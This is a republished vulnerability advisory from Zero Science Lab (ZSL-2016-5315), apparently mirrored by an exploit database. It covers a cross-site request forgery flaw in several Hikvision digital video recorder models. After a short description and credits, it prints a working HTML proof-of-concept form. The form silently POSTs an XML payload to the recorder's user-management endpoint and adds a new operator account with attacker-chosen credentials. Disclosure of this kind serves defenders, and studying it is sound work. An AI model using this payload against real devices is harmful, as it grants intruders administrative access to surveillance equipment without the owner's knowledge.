###########################

# Hikvision Digital Video Recorder Cross Site Request Forgery Vulnerability

###########################

Hikvision Digital Video Recorder Cross-Site Request Forgery


Vendor: Hikvision Digital Technology Co., Ltd
Product web page: http://www.hikvision.com
Affected version: LV-D2104CS
DS-7316HFI-ST
DS-7216HVI-SV/A
DS-7208HVI-SH
DS-7204HVI-SH

Summary: Hikvision is the global leader of video surveillance
products and solutions, manufactures a wide range of top-quality,
reliable, and professional solutions.

Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.

Tested on: Hikvision-Webs


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5315
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5315.php

Vendor: http://overseas.hikvision.com/europe/list01_435.html


13.01.2016

--


CSRF Add Operator:
------------------

<html>
<body>
<form action="http://10.0.0.8/PSIA/Security/AAA/users" method="POST" enctype="text/plain">
<input type="hidden" name="&lt;&#63;xml&#32;version" value="&apos;1&#46;0&apos;&#32;encoding&#61;&apos;utf&#45;8&apos;&#63;&gt;&lt;User&gt;&lt;id&gt;3&lt;&#47;id&gt;&lt;userName&gt;tes2t&lt;&#47;userName&gt;&lt;password&gt;test2&lt;&#47;password&gt;&lt;Extensions&gt;&lt;bondIp&gt;&lt;ipAddress&gt;0&#46;0&#46;0&#46;0&lt;&#47;ipAddress&gt;&lt;&#47;bondIp&gt;&lt;attribute&gt;&lt;inherent&gt;true&lt;&#47;inherent&gt;&lt;&#47;attribute&gt;&lt;&#47;Extensions&gt;&lt;&#47;User&gt;" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-04-15]

###########################